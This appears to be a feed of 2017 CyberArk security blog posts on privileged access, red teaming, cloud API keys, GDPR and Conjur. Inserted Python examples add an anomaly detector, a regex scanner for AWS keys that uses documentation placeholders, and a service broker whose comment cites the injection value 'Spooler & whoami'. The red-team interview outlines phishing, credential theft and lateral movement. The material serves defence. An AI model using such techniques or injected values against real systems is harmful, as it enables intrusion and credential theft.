Once all of these critical accounts are located within a vault, it’s time to turn your attention to usage control. In today’s collaborative environment, many people need access to privileged accounts—from third-party contractors to temporary employees and more. Solutions such as CyberArk Privileged Session Manager can help manage and monitor privileged account sessions without impacting the end-user experience or disrupting system administrators’ workflow. It allows users to connect to target systems within their environment via an agentless jump server. This isolates the user from the target systems’ passwords (ensuring credentials never reach endpoints) while enabling authorized access so s/he can perform necessary duties. Meanwhile, the secure vault keeps the passwords hidden and protected and rotates them (either each time they are used or on a set scheduled cycle). Monitoring and recording capabilities enable security teams to track user activity, pinpoint suspicious privileged sessions and immediately terminate them, as needed.

A key added bonus is that organizations can continue to leverage native tools such as PuTTY, Remote Desktop Connection Manager, etc. CyberArk can configure these tools to go through the CyberArk proxy channels to reach those target systems without introducing a lot of latency between the user and the job they’re there to do.

Keep a Watchful Eye

The last step is keeping a watchful eye and making sure that you understand where anomalies are actually taking place in the day-to-day routine. For example, does John typically work from 8:00 to 5:00, but suddenly starts to check out passwords at 2:00 a.m.? Was that really even John, or was it someone else? Or, what if John normally checks out 10 to 15 passwords per day, then all of a sudden he starts checking out significantly more?

But it’s not just user behavioral analytics—it’s also environmental. What happens if we can detect the very first time that someone is able to compromise the system by brute-forcing their way in as an administrator or another admin account? Or creating a backdoor account and then logging into it at strange hours?

CyberArk Privileged Threat Analytics is a security intelligence system that allows organizations to detect, alert and respond to attacks targeting privileged accounts. It is designed to identify an attack in real-time and automatically respond to stop an attacker from moving laterally to advance the attack, because in order to move laterally, the attacker needs to have the necessary credentials to escalate privileges. CyberArk individualizes every single password, and therefore stops the lateral movement and shuts down the pathway. With CyberArk, organizations can set baselines and create thresholds for anomalies and get notifications immediately on true security events, which helps to lower the alert volume. Additionally, taking advantage of integrations—or tools that speak fluently with each other—helps to minimize alert fatigue.
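The baseline-and-threshold idea behind the three scenarios above (John’s 2:00 a.m. checkout, John checking out far more passwords than usual, and an administrator account brute-forced before a successful logon), as an added example that is not CyberArk Privileged Threat Analytics code. The audit-log line format, the users `john` and `admin`, the two weeks of "normal" history and the thresholds (working-hour window, mean plus three standard deviations for daily volume, five failed logons within ten minutes) are all constructed assumptions for this example.

```python
"""Baseline-and-threshold detection over privileged-account audit events.

Added illustration, not CyberArk Privileged Threat Analytics code. The log
format, the users, the working-hours baseline and the thresholds are all
constructed assumptions chosen to mirror the scenarios in the post.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from statistics import mean, pstdev

LOG_FORMAT = "%Y-%m-%dT%H:%M:%SZ"


@dataclass(frozen=True)
class Event:
    ts: datetime
    user: str
    event: str      # checkout | logon_failed | logon_success


@dataclass(frozen=True)
class Alert:
    user: str
    ts: datetime
    kind: str
    detail: str


def parse_line(line: str) -> Event:
    """Constructed line format: '<ISO-8601 UTC> user=<name> event=<type>'."""
    ts, rest = line.split(" ", 1)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    return Event(datetime.strptime(ts, LOG_FORMAT).replace(tzinfo=timezone.utc),
                 fields["user"], fields["event"])


def build_baseline(history):
    """Per user: the hour window and the daily checkout volume seen in normal history."""
    per_user = defaultdict(list)
    for e in history:
        if e.event == "checkout":
            per_user[e.user].append(e)
    baseline = {}
    for user, evs in per_user.items():
        hours = [e.ts.hour for e in evs]
        counts = list(Counter(e.ts.date() for e in evs).values())
        baseline[user] = {"hour_min": min(hours), "hour_max": max(hours),
                          "daily_mean": mean(counts), "daily_std": pstdev(counts)}
    return baseline


def detect(baseline, events, fail_threshold=5, fail_window=timedelta(minutes=10)):
    """Flag off-hours checkouts, checkout volume spikes and brute-forced logons."""
    alerts, daily, failures = [], Counter(), defaultdict(list)
    for e in sorted(events, key=lambda ev: ev.ts):
        if e.event == "checkout":
            b = baseline.get(e.user)
            if b is None:
                alerts.append(Alert(e.user, e.ts, "unknown-user", "checkout by a user with no baseline"))
                continue
            if not b["hour_min"] <= e.ts.hour <= b["hour_max"]:
                alerts.append(Alert(e.user, e.ts, "off-hours",
                                    f"checkout at {e.ts:%H:%M}, usual window "
                                    f"{b['hour_min']:02d}:00-{b['hour_max']:02d}:59"))
            key = (e.user, e.ts.date())
            daily[key] += 1
            # mean + 3 sigma, with a floor of one so a perfectly regular history still has slack
            limit = b["daily_mean"] + 3 * max(b["daily_std"], 1.0)
            if daily[key] == int(limit) + 1:        # raise once, when the threshold is first crossed
                alerts.append(Alert(e.user, e.ts, "volume",
                                    f"{daily[key]} checkouts today vs baseline {b['daily_mean']:.1f}/day"))
        elif e.event == "logon_failed":
            failures[e.user].append(e.ts)
        elif e.event == "logon_success":
            recent = [t for t in failures[e.user] if e.ts - t <= fail_window]
            if len(recent) >= fail_threshold:
                alerts.append(Alert(e.user, e.ts, "brute-force",
                                    f"{len(recent)} failed logons within {fail_window} before success"))
            failures[e.user].clear()
    return alerts


def constructed_history():
    """Two weeks of constructed 'normal' data: john checks out 12 passwords per weekday, 08:00-17:55."""
    lines = []
    day = datetime(2017, 9, 18, tzinfo=timezone.utc)          # a Monday
    for offset in range(14):
        d = day + timedelta(days=offset)
        if d.weekday() < 5:
            for k in range(12):
                stamp = d.replace(hour=8 + (k * 10) // 12, minute=5 * k)
                lines.append(f"{stamp:{LOG_FORMAT}} user=john event=checkout")
    return lines


# Constructed suspect days: a 02:00 checkout, a 40-checkout day, six failed admin logons then a success.
SUSPECT_LOG = (
    ["2017-10-02T02:00:00Z user=john event=checkout"]
    + [f"2017-10-03T{9 + i // 6:02d}:{(i % 6) * 10:02d}:00Z user=john event=checkout" for i in range(40)]
    + [f"2017-10-03T23:0{i}:00Z user=admin event=logon_failed" for i in range(6)]
    + ["2017-10-03T23:07:00Z user=admin event=logon_success"]
)


def run_demo():
    baseline = build_baseline(parse_line(l) for l in constructed_history())
    return detect(baseline, [parse_line(l) for l in SUSPECT_LOG])


if __name__ == "__main__":
    for a in run_demo():
        print(f"{a.ts:%Y-%m-%d %H:%M} {a.kind:12} {a.user:6} {a.detail}")
```

The volume rule fires once per user per day, at the moment the threshold is crossed, rather than on every subsequent checkout; that single alert per condition is what keeps the alert volume down, as the paragraph above says. A user with no baseline at all is reported separately, since a freshly created account checking out passwords is exactly the "backdoor account" case.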

For additional details on the attack lifecycle and how privileged accounts come into play, along with common hurdles to establishing the most effective protection, I invite you to view the on-demand presentation.

]]>
Think Like an Attacker and Improve Your Defensive Strategy https://www.cyberark.com/blog/think-like-attacker-improve-defensive-strategy/ Thu, 05 Oct 2017 12:50:23 +0000 https://www.cyberark.com/?p=17853/

The CyberArk Red Team is a highly qualified group of industry veterans who are trained to use “any means necessary” – just as an attacker would – to help security operations teams identify and measure which threats they can detect – and which ones they cannot.

In a recent post, we asked Shay Nahari, our Head of Red Team Services, about the process and goals of simulated attacks. In this exchange, we ask additional questions about an attack simulation and his team’s approach. Here are some highlights of our conversation:

Q: How do organizations test internal and external systems, so that the exercise successfully mimics real attacks?

A: If you examine real-world breaches, you can see that adversaries are always thinking – and operating – in terms of goals, such as stealing intellectual property or financial records. With traditional penetration testing, you would have someone scan to pinpoint specific vulnerabilities, such as an unpatched Windows system, on the network. While this is certainly an important vulnerability to know about, advanced attackers simply don’t think like this. They are goal-driven and will try multiple times until they get into the network and on to the path that will lead them to the crown jewels. This is done by hunting for privileges that will allow them to move around on the network. Make no mistake – attackers will get in. Operating under the assumption that you’ve already been breached is the first step in improving your organization’s security posture.

Q: During Red Team adversarial simulation testing, are you asked to breach the perimeter or do you begin the exercise on the inside?

A: While we’ve done both forms of testing, we preach to “assume breach,” so we most often start from within the network, on a VM or an internal user’s laptop, for example. There is always a way to get into the network either through exploiting an external facing device or through social engineering.

Q: In your attack simulation, you created a connection back to a C2 server to carry out the initial breach. What are some of the ways to gain network access?

A: We work to gain access in a variety of ways, such as deploying malicious code in enterprise applications or abusing inherent trust both externally and internally to gain a foothold. Examples include phishing with an HTA file, link or macro-embedded document sent to multiple people within the organization. All of these methods will lead to in-memory execution of our payloads. Once we’ve infiltrated the network, we’ll abuse trust, like credentials, misconfiguration or software vulnerability, to escalate privileges locally. Attackers are lazy – they will usually choose the path of least resistance. Humans are always the easiest option to exploit.

Q: So, attackers will try to steal credentials from a compromised machine?

A: There are multiple credential locations within Windows – some of them are within Windows credential managers, user history, applications and even Outlook. Microsoft has done a lot of work to harden these locations (particularly from v8.1 on), but attackers continue to innovate, and they have found ways to circumvent these protections. If there is a privileged credential on a machine, it’s almost impossible to stop an attacker from stealing it and using it to help achieve his/her goal. That’s why it’s so important to ensure workstations don’t contain privileged accounts within the network.

(Editor’s note: CyberArk Endpoint Privilege Manager helps organizations to block and contain attacks at the endpoint, reducing the risk of information being stolen or encrypted and held for ransom. A combination of privileged security and application control reduces the risk of malware infection. Unknown applications run in a restricted mode to contain threats and behavioral analysis blocks credential theft attempts. These critical protection technologies are deployed as a single agent to strengthen existing endpoint security. It also enables security teams to enforce granular least privilege policies for IT administrators, helping organizations to effectively segregate duties on Windows servers.)

Q: Is there a difference between an external or internal attack?

A: The concept of inside vs. outside is obsolete. We view internal resources as hostile territory. Organizations need to treat their internal network in the same way they treat their external network. Just like you would not put an RDP connection outside, connected to the internet with a weak password, you should not do it internally. At the end of the day, a compromised workstation or malicious insider will lead to the same result.

Q:  What is the biggest deterrent to you being able to move laterally throughout a network?

A: This is relevant to almost every threat actor out there – from script kiddies to nation states and everything in between: Lateral movement occurs after an attacker finds a user’s privileged accounts and begins impersonating that user by using those privileged accounts. In almost all of our engagements, we end up searching and querying Active Directory to figure out who is logging in and from where, in our hunt for privileges. As an attacker, if I cannot access your privileged accounts (passwords, SSH keys, tokens, etc.), my job becomes infinitely harder to do.

Interested in learning more about our Red Team’s research? Check out our Threat Research blog, which features in-depth technical research from CyberArk Labs and Red Team security experts to help you think like an attacker by keeping you ahead of the latest threats.

]]>
CyberArk Cloud Automation Capabilities Support Hybrid & Native Cloud Environments https://www.cyberark.com/blog/cyberark-cloud-automation-capabilities-support-hybrid-native-cloud-environments/ Tue, 03 Oct 2017 14:55:57 +0000 https://www.cyberark.com/?p=17773/

CyberArk’s AMI and Cloud Formation Templates enable a complete CyberArk environment (including primary and Disaster Recovery (DR) vaults with all of the components and session monitoring) to be conveniently built and deployed in as little as 15 minutes in an AWS environment. This is very powerful for customers with “all in,” or native cloud environments. However, unless organizations have fully adopted the cloud, most will have some form of a hybrid environment. The CyberArk AMI and Cloud Formation Templates can now be configured to support hybrid environments too.

Securing the operations of both cloud and on-premises environments is one of the unique challenges of hybrid environments. Typically, customers run the CyberArk Privileged Account Security Solution, including the vault, on-premises and extend into the cloud environment. But customers can also run the vault in the cloud to support on-premises and cloud workloads.

By using CyberArk’s reference architecture for AWS, the CyberArk Cloud Formation Templates can be configured to support hybrid environments. There are, of course, many different hybrid environments and potential deployment configurations.

The key decisions to make are where to deploy the primary and DR vaults, and how to deploy the components (Password Vault Web Access, Central Password Management, CyberArk Privileged Session Manager and CyberArk Privileged Session Manager SSH Proxy) to efficiently support privilege requests in the on-premises and AWS environments. In organizations with hybrid environments that are already using a privileged account security solution, the deployed solution already helps to secure the on-premises environment. In this case, the primary and DR vaults will run in the on-premises data center, but instances of the components will need to run in both the on-premises and hybrid environments.

Here, the CyberArk Cloud Formation Templates for AWS (CFT) can be used to build the components in the AWS environment. These components can then be linked to the vaults using a secure connection.

Two typical configurations are shown in the following diagrams. The first diagram, of an extended configuration, shows the vault (Primary and DR) running on premises and managing infrastructure and workloads in the on-premises environment and extended out to manage infrastructure and workloads running on the AWS cloud. Here, the CyberArk components running on AWS have been built leveraging CyberArk’s CFT and AMI automation capabilities.

Note: To simplify the diagrams, the additional layers of redundancy and security used in a typical deployment are not shown.

The second diagram shows the vault (Primary and DR) running on the AWS cloud and managing privileges for both the on-premises and cloud infrastructure and workloads. In this example, vaults running on AWS extend back to the on-premises environment. Note that the complete AWS environment (vaults and components) has been built leveraging CyberArk’s CFT and AMI automation capabilities.

The CyberArk architecture has been designed to be very flexible and to be configured to support complex and demanding environments. For example, configurations become more challenging when organizations use multiple cloud vendors and operate multiple on-premises environments. However, for CISOs wanting to consistently enforce security and access policies across hybrid environments, it is important to establish a single control point for the on-premises and cloud environment—this is achieved by using the same privileged account security solution to manage all the environments.

All CyberArk solutions, including CyberArk Conjur, are designed to scale to meet the needs of large enterprises with globally distributed operations. In these hybrid examples, the architecture has been designed to optimize performance by deploying the CyberArk components close to the devices they are managing. The CyberArk architecture is also designed to allow multiple instances of the components to be deployed—so components can be located on multiple on-premises and cloud environments.

The CyberArk CFT and AMIs for AWS are available now and can be configured to support various native/“all in cloud” and hybrid environments. Contact sales or customer support for additional information or learn more about how CyberArk can support your cloud environment.
]]>
Get Your Enterprise Ready for General Data Protection Regulation (GDPR) https://www.cyberark.com/blog/get-enterprise-ready-general-data-protection-regulation-gdpr/ Tue, 26 Sep 2017 19:16:44 +0000 https://www.cyberark.com/?p=17600/

The General Data Protection Regulation (GDPR) is said to be one of the most important changes to data privacy regulations within the past two decades. The primary purpose of GDPR is to reinforce the personal data rights of all individuals residing within the European Union, and to harmonize the way member states enforce data protection across this geography. The fact of the matter is, most people today do not trust their personal data in the hands of businesses – and honestly, who can blame them?

Significant personal data breaches continue to dominate headlines. Most organizations are not taking security seriously enough with some even admitting they are well aware of existing security gaps but deliberately look the other way to keep business costs down and maintain a higher profitability. As we’ve seen over the past few months, the media has highlighted both the financial and reputational implications with being caught in non-compliance – and for good reason.

GDPR will affect organizations globally. If an organization is found to be negligent, they’ll face fines north of €20 million or 4 percent of total global turnover (whichever is greater). Moreover, there are equally serious reputational risks such as significant brand damage and loss of both consumer trust and loyalty. Gartner predicts that by the end of 2018, more than 50 percent of companies affected by the GDPR will not be in full compliance with its requirements.1 This begs a very important question: is your enterprise really ready?

What to Know and Understand

Understand where personal data resides within your organization. Personal data covers any information relating to an identifiable person: name, address, location data, online identifiers, health information, income, cultural profile and more. Enterprises should map their data flows in a prioritized manner, starting from the top down with whatever is considered high risk and with the business processes that gather, process and protect sensitive personal data. CyberArk solutions will help an enterprise lock down the access both human and non-human users have to critical systems and applications, but before you can do that, you first need to identify exactly where the data resides within your organization. Additionally, any personal data that no longer serves a legitimate business purpose needs to be deleted. Backups and duplicate copies of personal data files might land you in the hot seat if you don’t handle your data subjects’ ‘right to erasure’ correctly.

Get a handle on your supply chain. One important change in GDPR that was absent from its predecessor, the Data Protection Directive, is the set of direct legal obligations placed on data processors. This change exposes processors to litigation and damage claims directly from data subjects, whereas before, processors really only needed to concern themselves with the contractual agreements they had in place with their data controllers. Once GDPR goes into enforcement, a controller or processor involved in a breach will have to demonstrate that it was not responsible for the event that caused the damage in order to escape liability. You might have the most comprehensive GDPR strategy in place, with all the necessary tools and components to protect your personal data – but substantial risk still resides within your third-party vendor supply chain. There needs to be a greater degree of transparency across the supply chain, with a shared responsibility for securing personal data.

Additional Considerations

Given that GDPR is a very complex and far-reaching regulation that cannot be addressed overnight, it’s best not to boil the ocean. Take a pragmatic approach. One of the first and most critical steps for enterprise-level organizations is to partner with an advisory consultant. Most consultancies offer GDPR-specific workshops, detailed assessments, regular testing and actionable guidance, and will work with your team to put in place the personnel, processes and technology that fit your strategy for maintaining compliance with the regulation.

I previously discussed five ways CyberArk can help you address GDPR, highlighting some of the key articles within the regulation and how CyberArk can help mitigate the risk of non-compliance. It’s well understood that complying with GDPR cannot be achieved with a single security vendor – it’s a team effort. CyberArk customers also have access to our C3 Alliance Technology Program, which provides a wide range of integrations with security solution providers from around the world. These technology integrations enable an organization to realize a much more comprehensive GDPR solution, as well as bring more value to existing security investments.

Take the first step and download the Security Checklist for Securing Personal Data to get your enterprise ready for GDPR. Visit the CyberArk GDPR solution web page for more information on how privileged account security plays a critical part in safeguarding sensitive personal data.

Don’t get caught in the crosshairs of GDPR non-compliance. Get your enterprise ready before time runs out.

1 Gartner Press Release: “Gartner Says Organizations Are Unprepared for the 2018 European Data Protection Regulation,” May, 3 2017. gartner.com/newsroom/id/3701117

]]>
Four Critical Steps for Securing API Keys in Your Organization’s Cloud Workloads https://www.cyberark.com/blog/four-critical-steps-securing-api-keys-organizations-cloud-workloads/ Tue, 19 Sep 2017 15:22:37 +0000 https://www.cyberark.com/?p=17332/

Automation enables organizations to leverage the dynamic capabilities of the cloud. Today, enterprises are increasingly leveraging automation tools and DevOps initiatives to drive greater business agility, improve efficiency and optimize business processes. To achieve this agility securely, automation tools present credentials to cloud APIs so that only authenticated tools and applications can reach the organization’s cloud resources, customer data, infrastructure and other applications. Each public cloud vendor issues such credentials, generically referred to as “API keys” or “access keys,” which are unique to the organization’s cloud environment and are created when the environment is set up.

For example, in Amazon Web Services (AWS) environments, scripts use AWS access keys for accessing data, auto-scaling and other functions. In Azure, application keys (client secrets) for Azure AD applications play a similar role, as do service account keys in Google Cloud Platform. These keys are very powerful: a script or user holding one can stop or start a virtual server, copy a database or even wipe out entire workloads. With the right key, a script or user can do pretty much anything within a given cloud environment, so in the wrong hands they represent a major exposure.

API keys are essentially the “keys to the cloud kingdom,” yet despite this far-reaching power they are often relatively unprotected. Attackers phish users or compromise unprotected endpoints to steal them. Keys are also frequently embedded within applications, automation scripts and orchestration tools; as a consequence they are static and rarely changed, effectively hard coded and present in every copy of the app code or script. Attackers also harvest API keys from public repositories such as GitHub, where code is inadvertently pushed without the keys being removed. It is an easy mistake for a developer to make, and attackers run bots that continuously trawl these repositories, leaving little time for the developer to correct the error.

News reports underscore the dangers unsecured API keys present. Consider the OneLogin breach of May 2017, in which an attacker obtained a set of AWS keys and used them to access the AWS API from an intermediate host at another, smaller service provider, causing significant disruption for the organization.

Because API keys are such powerful credentials and are so widely used in cloud workloads, securing them and applying the principle of least privilege is imperative.

Four Steps for Securing API Keys

To help secure cloud workloads, enterprises should take the following four steps to prevent attackers from compromising the organization’s API keys:

  1. Discover and enumerate all keys: Use discovery tools that scan your cloud environment and code to pinpoint where API keys and other secrets exist. Assess and prioritize the API key and infrastructure exposures and collect reliable, comprehensive audit information.
  2. Remove embedded API keys: Securely remove API keys from scripts, applications and automation tools. Likewise, prevent human users from directly accessing the API keys.
  3. Secure API keys: Proactively protect API keys by storing them in a secure, centralized vault with strong access controls, allowing only authorized users and applications to reach them. Additionally, rotate API keys automatically and apply the principle of least privilege, including removing redundant permissions from the role or policy attached to the identity that owns the key.
  4. Automate secure credential use: Have scripts and automation tools retrieve API keys from the vault at run time through its API and integrations, rather than carrying them in code. To ensure that only the correct applications can obtain a given key, authenticate them with machine identities and application authentication.
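As an added example (not CyberArk’s code or a CyberArk tool), the following Python script implements the discovery step above for AWS credentials: it scans file contents for long-lived (AKIA) and temporary (ASIA) access key IDs by their fixed 20-character format, looks for candidate 40-character secret access keys next to a `secret_key`-style name, and drops low-entropy placeholders so a template value is not reported as a leak. The sample files are constructed here; the credential values are the placeholder pair AWS publishes in its own documentation, not real keys.

```python
"""Find AWS access keys embedded in source, scripts and config (discovery step).

Added example, not CyberArk code. SAMPLE_FILES is constructed; the key values
are the placeholder pair from AWS's own documentation, not live credentials.
"""
import math
import re
from collections import Counter

# Access key IDs are 20 chars: AKIA (long-lived IAM user key) or ASIA (temporary
# STS key) followed by 16 uppercase letters or digits. \b keeps a longer token
# that merely contains such a prefix from matching.
ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")

# Secret access keys are 40 base64-alphabet chars. Requiring a nearby
# "secret...key" name keeps unrelated 40-char hashes from being reported.
SECRET_KEY_RE = re.compile(
    r"(?i)(?:aws)?_?secret(?:_access)?_?key\W{0,5}([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])"
)

# A real secret is close to random; template placeholders ("XXXX...") are not.
MIN_SECRET_ENTROPY = 4.0


def shannon_entropy(text):
    """Bits of entropy per character of `text` (0.0 for one repeated character)."""
    n = len(text)
    # Each term is <= 0; abs() flips the sign and avoids returning -0.0.
    return abs(sum(c / n * math.log2(c / n) for c in Counter(text).values()))


def mask(secret):
    """Keep the ends so a finding can be matched to a key without logging it."""
    return secret[:4] + "..." + secret[-4:]


def scan_text(name, text):
    """Return one finding per credential-looking token in `text`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in ACCESS_KEY_RE.finditer(line):
            findings.append({"file": name, "line": lineno,
                             "kind": "access_key_id", "value": m.group(1)})
        for m in SECRET_KEY_RE.finditer(line):
            candidate = m.group(1)
            if shannon_entropy(candidate) >= MIN_SECRET_ENTROPY:
                findings.append({"file": name, "line": lineno,
                                 "kind": "secret_access_key", "value": mask(candidate)})
    return findings


def scan_files(files):
    """Scan a {path: contents} mapping; in practice feed it a repo or image layer."""
    findings = []
    for name, text in files.items():
        findings.extend(scan_text(name, text))
    return findings


SAMPLE_FILES = {
    # Constructed: a deploy script with the AWS documentation placeholder keys.
    "deploy.sh": (
        "#!/bin/sh\n"
        "export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
        "export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
        "aws s3 sync ./build s3://example-bucket\n"
    ),
    # Constructed: a template placeholder that must not be reported.
    "settings.py": (
        "DEBUG = False\n"
        "AWS_SECRET_ACCESS_KEY = '" + "X" * 40 + "'\n"
    ),
    # Constructed: clean file, credentials are injected at run time instead.
    "README.md": "Credentials are injected at run time; nothing is hard coded here.\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['file']}:{f['line']} {f['kind']} {f['value']}  -> remove, rotate, vault")
```

Each finding is a key that must be removed from the file, rotated (it has to be treated as exposed once it has been committed anywhere) and moved to a vault, which is steps 2 and 3 above. Pattern matching finds the AWS formats shown here; secrets without a fixed shape need the vendor-specific prefix or an entropy-only pass with a higher threshold.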

While moving workloads to the cloud can bring significant business benefits, it can also expand the attack surface by allowing unprotected API keys and other secrets and credentials to become damaging security vulnerabilities. In the hands of an external attacker or malicious insider, API keys could allow attackers to take full control of an organization’s cloud infrastructure, disable security controls, steal confidential information and disrupt operations.

However, while this post focuses on vulnerabilities that attackers can exploit, organizations that effectively manage their API keys, secrets and other credentials can minimize these vulnerabilities and secure their cloud workloads. In fact, with the right approach the cloud can be more secure than on-premises environments.

Learn more about protecting your cloud workloads in our new eBook “6 Key Use Cases for Securing Your Organization’s Cloud Workloads” or visit www.CyberArk.com/cloud.

 

]]>
The Whys and Wherefores of Automating Privileged Tasks https://www.cyberark.com/blog/whys-wherefores-automating-privileged-tasks/ Wed, 13 Sep 2017 21:39:56 +0000 https://www.cyberark.com/?p=17159/

A task can be defined as:

noun 1.  A piece of work that needs to be done regularly.

verb  2.  Assign a piece of work to.

IT operations teams are often inundated with menial, regular and repetitive tasks (e.g. triggering events, running daily monitoring activities and starting services) that not only hinder productivity but can also damage the business when done incorrectly. By limiting the number of tasks assigned directly to IT staff and providing greater access to automation, performance and productivity can be significantly improved. In parallel, it’s important to protect your environment from risks such as abuse or misuse of privileged access (insider threats), service outages caused by human error (typos) and third-party/remote vendor exposure (external threats).

Automation can be defined as:

noun 1.  The technique, method, or system of operating or controlling a process by highly automatic means, as by electronic devices, reducing human intervention to a minimum.

I recently addressed the importance of locking down the remote vendor attack pathway, as it is often an easy target for cyber attackers. By automating privileged tasks (any task performed by a privileged user), you can reduce the weak points in process workflows used by internal users and remote vendors alike. Once you fully automate a privileged task, you not only simplify privileged account security processes, but also help ensure your remote vendors (who might have access to critical servers, endpoints and applications) cannot inadvertently make an error that leads to a serious security risk.

Additionally, in the DevOps world, orchestration tools are automating tasks across workflows, taking this role from IT operations and vendors, even for ephemeral systems that no longer exist by the time anyone would review them. In the on-premises world, organizations still rely on vendors and support staff to perform tasks on an ad-hoc, often sporadic basis. Ideally, organizations should allow all of these tasks to be performed while a complete and correlated audit trail is generated automatically.

CyberArk solutions enable audit and operations teams to monitor and record task management and automation activity and promote user accountability across the board. Users can automate maintenance and provisioning tasks, (re)start and stop services, and launch only the applications or clients necessary to perform the task at hand – and nothing else. Users can also automate deployments through remote SSH command execution on target systems in both on-premises and cloud environments, all while maintaining the highest security standards. This functionality lets an organization restrict what privileged users are allowed to do with its most critical assets.

So How Does it Work?

Let’s walk through a simple example. A local Windows Server Administrator account has been on-boarded into the CyberArk Vault, and the usage of this privileged account has been limited to only a handful of allowed operations.

Full access to the server is not permitted, the user can only manage a list of services running on that server.

The user selects “Restart Service” and is then prompted to select the service to be managed from a pre-populated drop-down list, which further limits the control the user has over this account and the server.

After the user clicks ‘OK,’ the service restarts. Through the CyberArk Privileged Session Manager, a full audit trail is created capturing the actions completed by each privileged user. Any abnormal behavior, abuse of privileges or other privileged activity associated with that task is on record and immutably stored in a tamper-resistant vault. Sessions can be monitored in real time or reviewed later by a member of the audit team to improve security and support compliance requirements.
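As an added example, not CyberArk code, the following Python sketch shows the shape of the control described above in a generic form: the operation and the service name are both checked against a pre-populated allow list before any command is composed, the command is passed as an argument list so a crafted service name cannot smuggle in a second command, and every request, allowed or denied, is appended to an audit record. The allow list, the account name and the `runner` hook are constructed for the example; Windows `net.exe stop`/`net.exe start` are used for the restart because `net stop` waits for the service to stop before returning.

```python
"""Broker a privileged service operation through an allow list with an audit trail.

Added example, not CyberArk code. ALLOWED_* and the sample calls are constructed.
"""
import datetime
import subprocess

# The only services and operations this on-boarded account may touch. Anything
# not listed here is refused before a command line is ever built.
ALLOWED_SERVICES = {"Spooler", "W3SVC", "MSSQLSERVER"}
ALLOWED_OPERATIONS = {"start", "stop", "restart"}


class TaskDenied(Exception):
    """Raised when a request falls outside the allow list."""


def build_commands(operation, service):
    """Map an allowed (operation, service) pair to argv lists, never to a shell string."""
    if operation not in ALLOWED_OPERATIONS:
        raise TaskDenied(f"operation not permitted: {operation!r}")
    if service not in ALLOWED_SERVICES:
        raise TaskDenied(f"service not permitted: {service!r}")
    # `net stop` blocks until the service has stopped, so the start that
    # follows does not race the shutdown.
    if operation == "restart":
        return [["net.exe", "stop", service], ["net.exe", "start", service]]
    return [["net.exe", operation, service]]


def _default_runner(argv):
    # shell=False (the default): argv goes to CreateProcess as separate
    # arguments, so a name like 'Spooler & whoami' could never reach a shell
    # even if the allow list had not already rejected it.
    subprocess.run(argv, check=True)


def run_task(user, operation, service, runner=_default_runner, audit=None):
    """Execute one brokered task and append the outcome to `audit` (a list).

    Returns the audit record. A record is written whether the request is
    allowed, denied or fails, which is what a session reviewer relies on.
    """
    audit = audit if audit is not None else []
    record = {
        "time": datetime.datetime.now(datetime.timezone.utc).isoformat(),
        "user": user,
        "operation": operation,
        "service": service,
        "result": None,
    }
    try:
        commands = build_commands(operation, service)
    except TaskDenied as exc:
        record["result"] = f"denied: {exc}"
        audit.append(record)
        raise
    try:
        for argv in commands:
            runner(argv)
        record["result"] = "ok"
    except Exception as exc:  # the command itself failed: still record it
        record["result"] = f"error: {exc}"
        raise
    finally:
        audit.append(record)
    return record


if __name__ == "__main__":
    trail = []
    # Constructed dry run: print the argv instead of touching the local machine.
    run_task("alice", "restart", "Spooler", runner=print, audit=trail)
    print(trail[-1])
```

The value of the broker is that the user never holds the administrator credential: the account is retrieved and used by the broker, and the user's choice is reduced to two values drawn from lists. Extending it means adding entries to the allow lists, not widening the interface.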

Whether your tasks ‘need to get done regularly’ or they’re something you ‘assign a piece of work to,’ it’s in your best interest to introduce automation controls. The example above shows how easily this can be done. Most organizations today operate in a ‘do more with less’ environment, so it’s a best practice to automate simple privileged tasks to maintain a high level of security and let IT operations teams focus on workloads that deliver more value to the organization.

Learn more about privileged task automation and management by watching our on-demand webinar, “Curse of the Typo! Automate Repeated Tasks to Improve Efficiency and Reduce Risk Around User Mistakes.”  You can review the on-demand version of the webcast at any time.

]]>
Introducing CyberArk Conjur Open Source Secrets Management Solution https://www.cyberark.com/blog/introducing-cyberark-conjur-open-source-secrets-management-solution/ Wed, 06 Sep 2017 16:21:05 +0000 https://www.cyberark.com/?p=16860/

“Don’t underestimate the power of your vision to change the world. Whether that world is your office, your community, an industry or a global movement, you need to have a core belief that what you contribute can fundamentally change the paradigm or way of thinking about problems.”–  Leroy Hood

Today, I am excited to announce the release of Conjur as open source!

For those following our story, it’s been about four months since Conjur was acquired by CyberArk, and it’s been a fantastic, high-speed ride!  Conjur has always been interested in making an open source contribution, and now with the backing, support and encouragement of our team at CyberArk, I am thrilled to unveil our open source project to the world.

Conjur has been working on novel approaches to DevOps security, based on identity management for machines for the last four years. We have worked closely with related open source tools and projects and with prominent adopters of DevOps both large and small.

Our next mission is clear – to advance machine identity and access management methods for next-generation, distributed software and IT architectures. The best way forward is to open source the Conjur platform and participate fully in the open-source community. Our community website and Slack channels are available to facilitate growth and discussion.

Don’t Compromise Security

Conjur is a free, open-source and easy-to-use solution to securely store and safely retrieve secrets in high-velocity and widely-scaled IT environments. With Conjur, DevOps practitioners can solve their secrets management challenges, for users and machines, through automation without stifling architectural and software design choices. Conjur is designed for DevOps practitioners, from application developers and DevOps engineers to architects and DIYers who simply love to code.

Conjur’s platform features include:

  • A foundational secrets management service for DevOps environments, a core security capability for any environment
  • An authentication, authorization and audit service for people, code and machines that runs independently of other DevOps platforms and tools to provide separation of concerns and duties and fine-grained access control
  • A suite of open source integrations with leading CI/CD tools based on an Experience-Driven Design (XDD) development process.
  • An architecture that is optimized for containerized environments
  • Flexible, programmable tooling (REST API, CLI)

This is just the beginning of the CyberArk Conjur journey.  The project also aims to grow into a forum to share and collaboratively discuss best practices for privileged account security and management in high-velocity and connected systems.  We hope this project will blossom into a hub for innovation in privilege management for people, code and machines.

I encourage you to visit the brand-new Conjur website at https://www.conjur.org where you can download the software or get a free cloud-hosted dev account. Stay tuned – we are just getting started.

